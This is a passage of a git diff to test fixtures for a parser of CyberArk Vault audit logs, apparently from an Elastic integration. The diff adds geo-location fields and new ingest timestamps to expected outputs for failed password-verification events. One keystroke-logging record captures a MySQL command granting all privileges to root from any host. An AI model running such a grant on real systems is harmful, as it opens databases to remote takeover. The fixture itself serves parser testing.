Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:45:51\",\"IsoTimestamp\":\"2021-03-15T14:45:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "361", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log-expected.json index b2aec9f1215..16fbe87506e 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-38-cpm-verify-password-failed.log-expected.json @@ -7,10 +7,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "ELASTIC\\bart" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -93,7 +102,7 @@ "event": { "severity": 7, "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-12-09T13:37:01.193593200Z", + "ingested": "2021-12-14T14:42:29.505121135Z", "original": "\u003c7\u003e1 2021-03-15T13:19:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:19:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:19:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814397\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:19:58\",\"IsoTimestamp\":\"2021-03-15T13:19:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=67.43.156.15;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814397\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", @@ -117,10 +126,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "bart" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -204,7 +222,7 @@ "event": { "severity": 7, "reason": "Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). ", - "ingested": "2021-12-09T13:37:01.193602100Z", + "ingested": "2021-12-14T14:42:29.505124150Z", "original": "\u003c7\u003e1 2021-03-15T13:25:32Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:25:32\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:25:32Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814709\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserDN\\\" Value=\\\"ELASTIC.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:25:32\",\"IsoTimestamp\":\"2021-03-15T13:25:32Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \\n\",\"ExtraDetails\":\"address=67.43.156.15;username=bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814709\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"UserDN\",\"Value\":\"ELASTIC.local\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", @@ -228,10 +246,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "ELASTIC.local\\bart" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -314,7 +341,7 @@ "event": { "severity": 7, "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-12-09T13:37:01.193608300Z", + "ingested": "2021-12-14T14:42:29.505124718Z", "original": "\u003c7\u003e1 2021-03-15T13:33:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:33:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:33:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615815206\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:33:26\",\"IsoTimestamp\":\"2021-03-15T13:33:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=67.43.156.15;username=ELASTIC.local\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC.local\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615815206\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", @@ -338,10 +365,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "ELASTIC.local\\bart" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { @@ -425,7 +461,7 @@ "event": { "severity": 7, "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC.local\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", - "ingested": "2021-12-09T13:37:01.193614100Z", + "ingested": "2021-12-14T14:42:29.505125097Z", "original": "\u003c7\u003e1 2021-03-15T15:04:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 08:04:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T15:04:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.15-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.15-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=ELASTIC.local\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC.local\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615820651\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC.local\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 